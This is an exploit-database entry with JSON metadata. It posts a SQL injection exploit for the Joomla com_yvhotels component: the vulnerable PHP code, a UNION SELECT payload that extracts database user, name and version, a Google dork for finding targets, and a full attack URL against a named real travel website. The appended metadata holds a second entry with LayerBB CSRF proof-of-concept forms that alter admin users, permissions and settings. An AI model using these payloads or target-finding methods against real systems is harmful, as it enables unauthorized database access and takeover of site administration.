ID 1337DAY-ID-16531
Type zdt
Reporter z0mbyak
Modified 2011-07-18T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title: Joomla com_yvhotels SQL-inj Vuln
# Date: 18.07.2011
# Author: z0mbyak
# Vendor or Software Link: http://joomlaforum.ru/index.php/topic,49006.0.html
# Version: 1.1.1
# Category: [remote, webapps.]
# Google dork: inurl:"index.php?option=com_yvhotels"
# Tested in: web
Code:
function show_info( $task ) {
$id = mosGetParam($_REQUEST, 'id');
switch($task) {
case 'desc':
show_hotel_desc( $id );
break;
case 'facils':
show_hotel_facils( $id );
break;
case 'rooms':
show_hotel_rooms( $id );
break;
case 'address':
show_hotel_address( $id );
break;
}
}
function show_hotel_desc( $id ) {
global $database;
$database->setQuery( "SELECT * FROM #__yvhotels WHERE id=$id");
$rows = $database->loadObjectList();
if ($database->getErrorNum()) {
echo $database->stderr();
return false;
}
$row = $rows[0];
HTML_yvhotels_front::show_hotel_desc( $row );
}
SQL-Inj Vulnerability:
exploit: null+union+all+select+1,2,3,4,user(),6,7,8,9,10,11
,12,database(),version(),15,16,17,18,19,20,21--
VulnSite:
http://www.avalon-travel.ru/index.php?option=com_yvhotels&act=show_info&task=desc&id=null+union+all+select+1,2,3,4,user%28%29,6,7,8,
9,10,11,12,database%28%29,version%28%29,15,16,17,1 8,19,20,21--
Especially for forum.antichat.ru и rdot.org/forum/
Happy hacking)
z0mbyak.
# 0day.today [2018-02-16] #
{"hash": "dcea8b612e5e5aae8438bd5fab12158b58a8ed6c04ee5b7c47072d6b936b6a2e", "id": "1337DAY-ID-16531", "lastseen": "2018-02-16T07:18:22", "viewCount": 4, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "e533ca67bd368d25d816b023d8399c21", "key": "href"}, {"hash": "e9a138aa70ad42eaf7d6551a55a8dcc8", "key": "modified"}, {"hash": "e9a138aa70ad42eaf7d6551a55a8dcc8", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1324d24658da024e81a4115519848e1d", "key": "reporter"}, {"hash": "9c4b9c9e71bc398c7b38d06c2203f148", "key": "sourceData"}, {"hash": "d6b2c809f7dd3b2af68530fe58cd75f5", "key": "sourceHref"}, {"hash": "cb5adfbb901b8374eab6c75c88046844", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-02-16T07:18:22"}, "dependencies": {"references": [{"type": "nessus", "idList": ["ORACLELINUX_ELSA-2018-4040.NASL", "ORACLELINUX_ELSA-2018-4041.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-4040", "ELSA-2018-4041"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16531"]}], "modified": "2018-02-16T07:18:22"}, "vulnersScore": 0.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16531", "description": "Exploit for php platform in category web applications", "title": "Joomla com_yvhotels SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "b6fc63bb3bec2d2ec6b41ec6abb40fc8496c255cde0dda65a4ea5a5200fbf32b", "id": "1337DAY-ID-16531", "lastseen": "2016-04-20T02:22:51", "enchantments": {"score": {"value": 6.5, "modified": "2016-04-20T02:22:51"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1324d24658da024e81a4115519848e1d", "key": "reporter"}, {"hash": "497d186c1d9b8831fe2bfec3f9e391b4", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "cb5adfbb901b8374eab6c75c88046844", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "113af64f36d9036dd39bdb6e064bbb83", "key": "sourceHref"}, {"hash": "ec4c992fa04cfca831f055deba01535c", "key": "href"}, {"hash": "e9a138aa70ad42eaf7d6551a55a8dcc8", "key": "modified"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "e9a138aa70ad42eaf7d6551a55a8dcc8", "key": "published"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/16531", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "Joomla com_yvhotels SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "# Exploit Title: Joomla com_yvhotels SQL-inj Vuln\r\n# Date: 18.07.2011\r\n# Author: z0mbyak\r\n# Vendor or Software Link: http://joomlaforum.ru/index.php/topic,49006.0.html\r\n# Version: 1.1.1\r\n# Category: [remote, webapps.]\r\n# Google dork: inurl:\"index.php?option=com_yvhotels\"\r\n# Tested in: web\r\n\r\nCode:\r\n\r\nfunction show_info( $task ) {\r\n\r\n$id = mosGetParam($_REQUEST, 'id');\r\nswitch($task) {\r\n\r\ncase 'desc':\r\nshow_hotel_desc( $id );\r\nbreak;\r\n\r\ncase 'facils':\r\nshow_hotel_facils( $id );\r\nbreak;\r\n\r\ncase 'rooms':\r\nshow_hotel_rooms( $id );\r\nbreak;\r\n\r\ncase 'address':\r\nshow_hotel_address( $id );\r\nbreak;\r\n\r\n}\r\n}\r\n\r\nfunction show_hotel_desc( $id ) {\r\nglobal $database;\r\n\r\n$database->setQuery( \"SELECT * FROM #__yvhotels WHERE id=$id\");\r\n\r\n$rows = $database->loadObjectList();\r\nif ($database->getErrorNum()) {\r\necho $database->stderr();\r\nreturn false;\r\n}\r\n$row = $rows[0];\r\n\r\nHTML_yvhotels_front::show_hotel_desc( $row );\r\n}\r\n\r\nSQL-Inj Vulnerability:\r\n\r\nexploit: null+union+all+select+1,2,3,4,user(),6,7,8,9,10,11\r\n,12,database(),version(),15,16,17,18,19,20,21--\r\n\r\nVulnSite:\r\nhttp://www.avalon-travel.ru/index.php?option=com_yvhotels&act=show_info&task=desc&id=null+union+all+select+1,2,3,4,user%28%29,6,7,8,\r\n9,10,11,12,database%28%29,version%28%29,15,16,17,1 8,19,20,21--\r\n\r\nEspecially for forum.antichat.ru \u00d0\u00b8 rdot.org/forum/\r\n\r\nHappy hacking)\r\nz0mbyak.\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2011-07-18T00:00:00", "references": [], "reporter": "z0mbyak", "modified": "2011-07-18T00:00:00", "href": "http://0day.today/exploit/description/16531"}, "lastseen": "2016-04-20T02:22:51", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "# Exploit Title: Joomla com_yvhotels SQL-inj Vuln\r\n# Date: 18.07.2011\r\n# Author: z0mbyak\r\n# Vendor or Software Link: http://joomlaforum.ru/index.php/topic,49006.0.html\r\n# Version: 1.1.1\r\n# Category: [remote, webapps.]\r\n# Google dork: inurl:\"index.php?option=com_yvhotels\"\r\n# Tested in: web\r\n\r\nCode:\r\n\r\nfunction show_info( $task ) {\r\n\r\n$id = mosGetParam($_REQUEST, 'id');\r\nswitch($task) {\r\n\r\ncase 'desc':\r\nshow_hotel_desc( $id );\r\nbreak;\r\n\r\ncase 'facils':\r\nshow_hotel_facils( $id );\r\nbreak;\r\n\r\ncase 'rooms':\r\nshow_hotel_rooms( $id );\r\nbreak;\r\n\r\ncase 'address':\r\nshow_hotel_address( $id );\r\nbreak;\r\n\r\n}\r\n}\r\n\r\nfunction show_hotel_desc( $id ) {\r\nglobal $database;\r\n\r\n$database->setQuery( \"SELECT * FROM #__yvhotels WHERE id=$id\");\r\n\r\n$rows = $database->loadObjectList();\r\nif ($database->getErrorNum()) {\r\necho $database->stderr();\r\nreturn false;\r\n}\r\n$row = $rows[0];\r\n\r\nHTML_yvhotels_front::show_hotel_desc( $row );\r\n}\r\n\r\nSQL-Inj Vulnerability:\r\n\r\nexploit: null+union+all+select+1,2,3,4,user(),6,7,8,9,10,11\r\n,12,database(),version(),15,16,17,18,19,20,21--\r\n\r\nVulnSite:\r\nhttp://www.avalon-travel.ru/index.php?option=com_yvhotels&act=show_info&task=desc&id=null+union+all+select+1,2,3,4,user%28%29,6,7,8,\r\n9,10,11,12,database%28%29,version%28%29,15,16,17,1 8,19,20,21--\r\n\r\nEspecially for forum.antichat.ru \u00d0\u00b8 rdot.org/forum/\r\n\r\nHappy hacking)\r\nz0mbyak.\r\n\r\n\n\n# 0day.today [2018-02-16] #", "published": "2011-07-18T00:00:00", "references": [], "reporter": "z0mbyak", "modified": "2011-07-18T00:00:00", "href": "https://0day.today/exploit/description/16531"}
{"zdt": [{"lastseen": "2019-12-04T14:24:11", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-09-23T00:00:00", "published": "2019-09-23T00:00:00", "id": "1337DAY-ID-33269", "href": "https://0day.today/exploit/description/33269", "title": "LayerBB < 1.1.4 - Cross-Site Request Forgery Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: LayerBB 1.1.3 - Multiple CSRF\r\n# Author: 0xB9\r\n# Twitter: @0xB9Sec\r\n# Contact: 0xB9[at]pm.me\r\n# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=30\r\n# Version: 1.1.3\r\n# Tested on: Ubuntu 18.04\r\n# CVE: CVE-2019-16531\r\n\r\n\r\n1. Description:\r\nLayerBB is a free open-source forum software, multiple CSRF vulnerabilities were found such as editing user profiles and forums.\r\n\r\n\r\n2. Proof of Concepts:\r\n\r\n<!-- Edit Usergroup CSRF -->\r\n<form action=\"http://localhost/admin/edit_usergroup.php/id/1\" method=\"POST\" style=\"padding: 25px;\">\r\n <label for=\"g_name\">Name</label>\r\n <input type=\"text\" name=\"g_name\" id=\"g_name\" value=\"User\" class=\"form-control\">\r\n <label for=\"g_style\">Style <small><code>%username%</code> will be replaced with the user's username.</small></label>\r\n <textarea name=\"g_style\" id=\"g_style\" class=\"form-control\"><span>%username%</span></textarea>\r\n <label for=\"b_style_s\">Banner Style Start</label>\r\n <textarea name=\"b_style_s\" id=\"b_style_s\" class=\"form-control\"><span class=\"label label -default\"></textarea>\r\n <label for=\"b_style_e\">Banner Style End</label>\r\n <textarea name=\"b_style_e\" id=\"b_style_e\" class=\"form-control\"></span></textarea>\r\n <label for=\"permissions\">Permissions</label><br>\r\n <input type=\"checkbox\" name=\"permissions[]\" value=\"1\" checked=\"\"> view_forum<br><input type=\"checkbox\" name=\"permissions[]\" value=\"2\" checked=\"\"> create_thread<br><input type=\"checkbox\" name=\"permissions[]\" value=\"3\" checked=\"\"> reply_thread<br><input type=\"checkbox\" name=\"permissions[]\" value=\"4\"> access_moderation<br><input type=\"checkbox\" name=\"permissions[]\" value=\"5\"> access_administration<br>\r\n <br>\r\n <input type=\"checkbox\" name=\"is_staff\" value=\"1\"> This Usergroup is staff.\r\n <br>\r\n <input type=\"submit\" name=\"update\" value=\"Save Changes\" class=\"btn btn-default\">\r\n</form>\r\n<!-- Edit Usergroup CSRF End -->\r\n\r\n<!-- Edit User CSRF -->\r\n<form action=\"http://localhost/admin/edit_user.php/id/1\" method=\"POST\" style=\"padding: 25px;\">\r\n <label for=\"username\">Username</label>\r\n <input type=\"text\" name=\"username\" id=\"username\" value=\"Administrator\" class=\"form-control\">\r\n <label for=\"email\">Email Address</label>\r\n <input type=\"text\" name=\"email\" id=\"email\" value=\"[email\u00a0protected]\" class=\"form-control\">\r\n <label for=\"usermsg\">User Message</label>\r\n <input type=\"text\" name=\"usermsg\" id=\"usermsg\" value=\"User\" class=\"form-control\">\r\n <label for=\"signature\">User Signature</label>\r\n <textarea id=\"editor\" name=\"signature\" class=\"form-control\" style=\"min-height:250px;\"></textarea>\r\n <label for=\"disabled\">User Activated</label><br>\r\n <input type=\"radio\" name=\"disabled\" value=\"0\" checked=\"\"> Do Not Change<br>\r\n <input type=\"radio\" name=\"disabled\" value=\"0\"> Active<br>\r\n <input type=\"radio\" name=\"disabled\" value=\"1\"> Disabled<br>\r\n <br>\r\n <label for=\"usergroup\">Usergroup</label><br>\r\n <select name=\"usergroup\" id=\"usergroup\" style=\"width:100%;\">\r\n <option value=\"4\" selected=\"\">Dont Change</option>\r\n <option value=\"1\">User</option><option value=\"2\">Banned</option><option value=\"3\">Moderator</option><option value=\"4\">Administrator</option>\r\n </select><br><br>\r\n <input type=\"submit\" name=\"update\" value=\"Save Changes\" class=\"btn btn-default\">\r\n</form>\r\n<!-- Edit User CSRF End -->\r\n\r\n<!-- Edit Category CSRF -->\r\n<form action=\"http://localhost/admin/edit_category.php/id/1\" method=\"POST\" style=\"padding: 25px;\">\r\n <label for=\"cat_title\">Title</label>\r\n <input type=\"text\" name=\"cat_title\" id=\"cat_title\" value=\"First Category\" class=\"form-control\">\r\n <label for=\"cat_desc\">Description</label>\r\n <textarea name=\"cat_desc\" id=\"cat_desc\" class=\"form-control\">First category on this forum!</textarea>\r\n <br>\r\n <label for=\"allowed_usergroups\">Allowed Usergroups</label><br>\r\n <input type=\"checkbox\" name=\"allowed_ug[]\" value=\"0\" checked=\"\"> Guest<br><input type=\"checkbox\" name=\"allowed_ug[]\" value=\"1\" checked=\"\"> User<br><input type=\"checkbox\" name=\"allowed_ug[]\" value=\"2\"> Banned<br><input type=\"checkbox\" name=\"allowed_ug[]\" value=\"3\" checked=\"\"> Moderator<br><input type=\"checkbox\" name=\"allowed_ug[]\" value=\"4\" checked=\"\"> Administrator<br>\r\n <br>\r\n <input type=\"submit\" name=\"update\" value=\"Save Changes\" class=\"btn btn-default\">\r\n</form>\r\n<!-- Edit Category CSRF End -->\r\n\r\n<!-- Edit Node CSRF -->\r\n<form action=\"http://localhost/admin/edit_node.php/id/1\" method=\"POST\" style=\"padding: 25px;\">\r\n <label for=\"cat_title\">Title</label>\r\n <input type=\"text\" name=\"node_title\" id=\"cat_title\" value=\"First Node\" class=\"form-control\">\r\n <label for=\"cat_desc\">Description</label>\r\n <textarea name=\"node_desc\" id=\"cat_desc\" class=\"form-control\">The first node on this forum</textarea>\r\n <label for=\"parent\">Parent</label><br>\r\n <select name=\"node_parent\" id=\"parent\" style=\"width:100%;\">\r\n <option value=\"1\" selected=\"\">First Category</option>\r\n </select>\r\n <br>\r\n <label for=\"additional_option\">Additional Options</label><br>\r\n <input type=\"checkbox\" name=\"lock_node\" value=\"1\" id=\"lock_node\"> <label style=\"font-weight: normal;\" for=\"lock_node\">Lock Node</label>\r\n <br>\r\n <label for=\"allowed_usergroups\">Allowed Usergroups</label><br>\r\n <input type=\"checkbox\" name=\"allowed_ug[]\" value=\"0\" checked=\"\"> Guest<br><input type=\"checkbox\" name=\"allowed_ug[]\" value=\"1\" checked=\"\"> User<br><input type=\"checkbox\" name=\"allowed_ug[]\" value=\"2\"> Banned<br><input type=\"checkbox\" name=\"allowed_ug[]\" value=\"3\" checked=\"\"> Moderator<br><input type=\"checkbox\" name=\"allowed_ug[]\" value=\"4\" checked=\"\"> Administrator<br>\r\n <label for=\"labels\">Labels</label> <small>Each Line is a new label. HTML enabled.</small>\r\n <textarea name=\"labels\" id=\"labels\" class=\"form-control\"></textarea><br>\r\n <input type=\"submit\" name=\"update\" value=\"Save Changes\" class=\"btn btn-default\">\r\n</form>\r\n<!-- Edit Node CSRF End -->\r\n\r\n<!-- System Settings CSRF -->\r\n<form action=\"http://localhost/admin/general.php\" enctype=\"multipart/form-data\" method=\"POST\"><section class=\"col-lg-12\">\r\n <div class=\"box box-success\">\r\n <div class=\"box-header\">\r\n <div class=\"tab-content\" style=\"padding: 25px;\">\r\n <br>\r\n <label for=\"site_name\">Board Name</label>\r\n <input type=\"text\" class=\"form-control\" name=\"site_name\" id=\"site_name\" value=\"LayerBB Demo\">\r\n <label for=\"board_email\">Board Email</label>\r\n <input type=\"text\" class=\"form-control\" name=\"board_email\" id=\"board_email\" value=\"[email\u00a0protected]\">\r\n <label for=\"number_subs\">Number of shown subforums</label>\r\n <input type=\"text\" class=\"form-control\" name=\"number_subs\" id=\"number_subs\" value=\"3\">\r\n <input type=\"checkbox\" name=\"register_enable\" value=\"1\" id=\"reg_enable\" checked=\"\"> <label for=\"reg_enable\">Enable Registeration</label><br>\r\n <input type=\"checkbox\" name=\"post_merge\" value=\"1\" id=\"post_merge\" checked=\"\"> <label for=\"post_merge\">Merge Posts (<a href=\"#\" title=\"Merge consecutive posts by the same user.\" id=\"tooltip\">?</a>)</label><br>\r\n <input type=\"checkbox\" name=\"site_enable\" value=\"1\" id=\"site_enable\" checked=\"\"> <label for=\"site_enable\">Forum Enabled (<a href=\"#\" title=\"Allows you to enable or disable your forums.\" id=\"tooltip\">?</a>)</label><br>\r\n <input type=\"checkbox\" name=\"email_verify\" value=\"1\" id=\"email_verify\"> <label for=\"email_verify\">Email Verification (<a href=\"#\" title=\"Allows you to enable or disable email verification.\" id=\"tooltip\">?</a>)</label><br>\r\n <input type=\"checkbox\" name=\"enable_signatures\" value=\"1\" id=\"enable_signatures\" checked=\"\"> <label for=\"enable_signatures\">Allow user signatures (<a href=\"#\" title=\"Allows you to disable user signatures.\" id=\"tooltip\">?</a>)</label><br>\r\n <input type=\"checkbox\" name=\"enable_pcomments\" value=\"1\" id=\"enable_pcomments\" checked=\"\"> <label for=\"enable_pcomments\">Enable Profile Comments (<a href=\"#\" title=\"Allows you to disable profile comments.\" id=\"tooltip\">?</a>)</label><br>\r\n <br>\r\n <label for=\"default_language\">Default Languge</label><br>\r\n <select name=\"default_language\" id=\"Default_language\" class=\"form-control\">\r\n <option value=\"english\" selected=\"\">English</option>\r\n </select><br>\r\n <input type=\"checkbox\" name=\"enable_rtl\" value=\"1\" id=\"enable_rtl\"> <label for=\"enable_rtl\">Enable RTL (<a href=\"#\" title=\"Enable Right-to-left for languages that need RTL\" id=\"tooltip\">?</a>)</label><br><br>\r\n <label for=\"board_rules\">Board Rules</label>\r\n <span id=\"helpBlock\" class=\"help-block\">HTML tags will be converted into ascii codes. Hyperlinks are not supported!</span>\r\n <textarea name=\"board_rules\" class=\"form-control\" style=\"min-height:250px;\">- No spamming.</textarea>\r\n <br>\r\n <label for=\"offline_msg\">Offline Message</label>\r\n <span id=\"helpBlock\" class=\"help-block\">HTML tags will be converted into ascii codes.</span>\r\n <textarea name=\"offline_msg\" class=\"form-control\" style=\"min-height:250px;\"></textarea>\r\n <br>\r\n <label for=\"rcap_public\">reCaptcha Public Key</label>\r\n <input type=\"text\" name=\"rcap_public\" id=\"rcap_public\" class=\"form-control\" value=\"0\">\r\n <label for=\"rcap_private\">reCaptcha Private Key</label>\r\n <input type=\"text\" name=\"rcap_private\" id=\"rcap_private\" class=\"form-control\" value=\"0\">\r\n <input type=\"checkbox\" name=\"enable_recaptcha\" value=\"1\"> Use reCaptcha<br>\r\n <br>\r\n <label for=\"content\">Board Signature</label>\r\n <textarea id=\"editor\" name=\"board_signature\" class=\"form-control\" style=\"min-height:250px;\"></textarea>\r\n <div class=\"alert alert-info\" role=\"alert\"><b>Please Note:</b> HTML Tags do not work, line breaks and urls are automatically converted!</div>\r\n <br>\r\n <label for=\"custom_logo\">Easy Logo Changer</label>\r\n <input type=\"file\" name=\"custom_logo\" id=\"custom_logo\" class=\"form-control\">\r\n\r\n </div><br>\r\n <center><input type=\"submit\" name=\"update\" class=\"btn btn-default\" value=\"Save Settings\"></center><br>\r\n </div>\r\n </div></section>\r\n</form>\r\n<!-- System Settings CSRF End -->\r\n\r\n<!-- Manage Category CSRF -->\r\n<table class=\"table table-hover\">\r\n <thead>\r\n <tr>\r\n <th style=\"width:70%\">Category</th>\r\n <th style=\"width:10%\">Order</th>\r\n <th style=\"width:20%\">Controls</th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>\r\n <strong>test cat</strong><br>\r\n <small>test cat</small>\r\n </td>\r\n <td>\r\n <form action=\"http://localhost/admin/manage_category.php\" method=\"POST\">\r\n <input type=\"hidden\" name=\"cat_id\" value=\"2\">\r\n <input type=\"text\" class=\"form-control\" name=\"cat_place\" value=\"1\">\r\n <input type=\"submit\" name=\"change_place\" style=\"display:none;\">\r\n </form>\r\n </td>\r\n <td>\r\n <div class=\"btn-group\">\r\n <li><a href=\"http://localhost/admin/edit_category.php/id/2\">Edit Category</a></li>\r\n <li><a href=\"http://localhost/admin/manage_category.php/delete_category/2\">Delete Category</a></li>\r\n </div>\r\n </td>\r\n </tr><tr>\r\n <td>\r\n <strong>First Category</strong><br>\r\n <small>First category on this forum!</small>\r\n </td>\r\n <td>\r\n <form action=\"http://localhost/admin/manage_category.php\" method=\"POST\">\r\n <input type=\"hidden\" name=\"cat_id\" value=\"1\">\r\n <input type=\"text\" class=\"form-control\" name=\"cat_place\" value=\"2\">\r\n <input type=\"submit\" name=\"change_place\" style=\"display:none;\">\r\n </form>\r\n </td>\r\n <td>\r\n <div class=\"btn-group\">\r\n <li><a href=\"http://localhost/admin/edit_category.php/id/1\">Edit Category</a></li>\r\n <li><a href=\"http://localhost/admin/manage_category.php/delete_category/1\">Delete Category</a></li>\r\n </div>\r\n </td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<center><h3>Use <font color=\"red\">ENTER</font> to save catagory order</h3></center>\r\n<!-- Manage Category CSRF End -->\r\n\r\n<!-- Manage Node CSRF -->\r\n<table class=\"table table-hover\">\r\n <thead>\r\n <tr>\r\n <th style=\"width:70%\">Node</th>\r\n <th style=\"width:10%\">Order</th>\r\n <th style=\"width:20%\">Controls</th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td>\r\n <strong><a href=\"#\" target=\"_blank\">First Node</a></strong><br>\r\n <small>The first node on this forum</small><br>\r\n <small>Sub-Forums: </small>\r\n </td>\r\n <td>\r\n <form action=\"http://localhost/admin/manage_node.php\" method=\"POST\">\r\n <input type=\"hidden\" name=\"node_id\" value=\"1\">\r\n <input type=\"text\" class=\"form-control\" name=\"node_place\" value=\"0\">\r\n <input type=\"submit\" name=\"change_place\" style=\"display:none;\">\r\n </form>\r\n </td>\r\n <td>\r\n <div class=\"btn-group\">\r\n <li><a href=\"http://localhost/admin/edit_node.php/id/1\">Edit Node</a></li>\r\n <li><a href=\"http://localhost/admin/manage_node.php/delete_node/1\">Delete Node</a></li>\r\n <li><a href=\"http://localhost/admin/manage_node.php/toggle_lock/1\">Toggle Lock</a></li>\r\n </div>\r\n </td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<center><h3>Use <font color=\"red\">ENTER</font> to save catagory order</h3></center>\r\n<!-- Manage Node CSRF End -->\r\n\r\n<!-- Mass Mail CSRF -->\r\n<form action=\"http://localhost/admin/massemail.php\" method=\"POST\" style=\"padding: 25px;\">\r\n <label for=\"subject\">Subject</label>\r\n <input type=\"text\" name=\"subject\" id=\"subject\" value=\"\" class=\"form-control\">\r\n <label for=\"content\">Email Content</label>\r\n <textarea id=\"editor\" name=\"content\" class=\"form-control\" style=\"min-height:250px;\"></textarea><br>\r\n <div class=\"alert alert-info\" role=\"alert\"><b>Please Note:</b> HTML Tags do not work, line breaks and urls are automatically converted!</div>\r\n <input type=\"submit\" name=\"send\" value=\"Send Email\" class=\"btn btn-default\">\r\n</form>\r\n<!-- Mass Mail CSRF End -->\r\n\r\n<!-- Navbar CSRF -->\r\n<form method=\"POST\" action=\"http://localhost/admin/navbar.php\">\r\n <h4 class=\"modal-title\" id=\"myModalLabel\">Editing <b>google</b> Navbar Item</h4>\r\n <input type=\"hidden\" name=\"id\" value=\"1\">\r\n <div class=\"form-group\">\r\n <label for=\"title\">URL Title</label>\r\n <input type=\"text\" class=\"form-control\" id=\"title\" name=\"title\" value=\"google\">\r\n </div>\r\n <div class=\"form-group\">\r\n <label for=\"url\">URL</label>\r\n <input type=\"text\" class=\"form-control\" id=\"url\" name=\"url\" value=\"https://google.com\">\r\n </div>\r\n <div class=\"form-group\">\r\n <label for=\"newpage\">Open URL in new page</label>\r\n <select class=\"form-control\" id=\"newpage\" name=\"newpage\">\r\n <option value=\"1\">Current - Do Not Change</option>\r\n <option value=\"1\">Yes</option>\r\n <option value=\"0\">No</option>\r\n </select>\r\n </div>\r\n <div class=\"form-group\">\r\n <label for=\"order\">Order</label>\r\n <input type=\"text\" class=\"form-control\" id=\"order\" name=\"order\" value=\"1\">\r\n </div>\r\n <button type=\"submit\" name=\"savechange\" id=\"savechange\" class=\"btn btn-primary\">Save Changes</button>\r\n</form>\r\n<!-- Navbar CSRF End -->\r\n\r\n<!-- New Category CSRF -->\r\n<form action=\"http://localhost/admin/new_category.php\" method=\"POST\" style=\"padding: 25px;\">\r\n <label for=\"cat_title\">Title</label>\r\n <input type=\"text\" name=\"cat_title\" id=\"cat_title\" class=\"form-control\">\r\n <label for=\"cat_desc\">Description</label>\r\n <textarea name=\"cat_desc\" id=\"cat_desc\" class=\"form-control\"></textarea>\r\n <br>\r\n <label for=\"allowed_usergroups\">Allowed Usergroups</label>\r\n <br>\r\n <input type=\"checkbox\" name=\"allowed_ug[]\" value=\"1\" checked=\"\"> User<br><input type=\"checkbox\" name=\"allowed_ug[]\" value=\"2\" checked=\"\"> Banned<br><input type=\"checkbox\" name=\"allowed_ug[]\" value=\"3\" checked=\"\"> Moderator<br><input type=\"checkbox\" name=\"allowed_ug[]\" value=\"4\" checked=\"\"> Administrator<br>\r\n <br>\r\n <input type=\"submit\" name=\"create\" value=\"Create Category\" class=\"btn btn-default\">\r\n</form>\r\n<!-- New Category CSRF End -->\r\n\r\n<!-- New Node CSRF -->\r\n<form action=\"http://localhost/admin/new_node.php\" method=\"POST\" style=\"padding: 25px;\">\r\n <label for=\"node_title\">Title</label>\r\n <input type=\"text\" name=\"node_title\" id=\"node_title\" class=\"form-control\">\r\n <label for=\"node_desc\">Description</label>\r\n <textarea name=\"node_desc\" id=\"node_desc\" class=\"form-control\"></textarea>\r\n <label for=\"parent\">Parent</label><br>\r\n <select name=\"node_parent\" id=\"parent\">\r\n <option value=\"1\">First Category</option><option value=\"&1\">&nbps;&nbps;&nbps;&nbps;-First Node</option>\r\n </select>\r\n <br>\r\n <label for=\"additional_option\">Additional Options</label><br>\r\n <input type=\"checkbox\" name=\"lock_node\" value=\"1\" id=\"lock_node\"> <label style=\"font-weight: normal;\" for=\"lock_node\">Lock Node</label>\r\n <br>\r\n <label for=\"allowed_usergroups\">Allowed Usergroups</label>\r\n <br>\r\n <input type=\"checkbox\" name=\"allowed_ug[]\" value=\"1\" checked=\"\"> User<br><input type=\"checkbox\" name=\"allowed_ug[]\" value=\"2\" checked=\"\"> Banned<br><input type=\"checkbox\" name=\"allowed_ug[]\" value=\"3\" checked=\"\"> Moderator<br><input type=\"checkbox\" name=\"allowed_ug[]\" value=\"4\" checked=\"\"> Administrator<br>\r\n <label for=\"labels\">Labels</label> <small>Each Line is a new label. HTML enabled.</small>\r\n <textarea name=\"labels\" id=\"labels\" class=\"form-control\"></textarea><br>\r\n <input type=\"submit\" name=\"create\" value=\"Create Node\" class=\"btn btn-default\">\r\n</form>\r\n<!-- New Node CSRF End -->\r\n\r\n<!-- New Usergroup CSRF End -->\r\n<form action=\"http://localhost/admin/new_usergroup.php\" method=\"POST\" style=\"padding: 25px;\">\r\n <label for=\"g_name\">Name</label>\r\n <input type=\"text\" name=\"g_name\" id=\"g_name\" class=\"form-control\">\r\n <label for=\"g_style\">Style <small><code>%username%</code> will be replaced with the user's username.</small></label>\r\n <textarea name=\"g_style\" id=\"g_style\" class=\"form-control\"><span>%username%</span></textarea>\r\n <label for=\"permissions\">Permissions</label><br>\r\n <input type=\"checkbox\" name=\"permissions[]\" value=\"1\"> view_forum<br><input type=\"checkbox\" name=\"permissions[]\" value=\"2\"> create_thread<br><input type=\"checkbox\" name=\"permissions[]\" value=\"3\"> reply_thread<br><input type=\"checkbox\" name=\"permissions[]\" value=\"4\"> access_moderation<br><input type=\"checkbox\" name=\"permissions[]\" value=\"5\"> access_administration<br>\r\n <br>\r\n <input type=\"checkbox\" name=\"is_staff\" value=\"1\"> This Usergroup is staff.\r\n <br>\r\n <input type=\"submit\" name=\"new\" value=\"Create Usergroup\" class=\"btn btn-default\">\r\n</form>\r\n<!-- New Usergroup CSRF End -->\r\n\r\n<!-- Profile Fields CSRF -->\r\n<form method=\"POST\" action=\"http://localhost/admin/profile_fields.php\" style=\"padding: 25px;\">\r\n <input type=\"hidden\" name=\"id\" value=\"1\">\r\n <div class=\"form-group\">\r\n <label for=\"title\">Title</label>\r\n <input type=\"text\" class=\"form-control\" id=\"title\" name=\"title\" value=\"discord\">\r\n </div>\r\n <button type=\"submit\" name=\"savechange\" id=\"savechange\" class=\"btn btn-primary\">Save Changes</button>\r\n</form>\r\n<!-- Profile Fields CSRF End -->\r\n\r\n<!-- Sidebar CSRF -->\r\n<form method=\"POST\" action=\"http://localhost/admin/sidebar.php\" style=\"padding: 25px;\">\r\n <input type=\"hidden\" name=\"id\" value=\"1\">\r\n <div class=\"form-group\">\r\n <label for=\"title\">Title</label>\r\n <input type=\"text\" class=\"form-control\" id=\"title\" name=\"title\" value=\"Demo Information\">\r\n </div>\r\n <div class=\"form-group\">\r\n <label for=\"content\">Content</label>\r\n <textarea class=\"form-control\" name=\"content\" id=\"content\" style=\"min-height:250px;\"><div class=\"alert alert-danger\" role=\"alert\"> This is the LayerBB Demo Website, you can login using<br 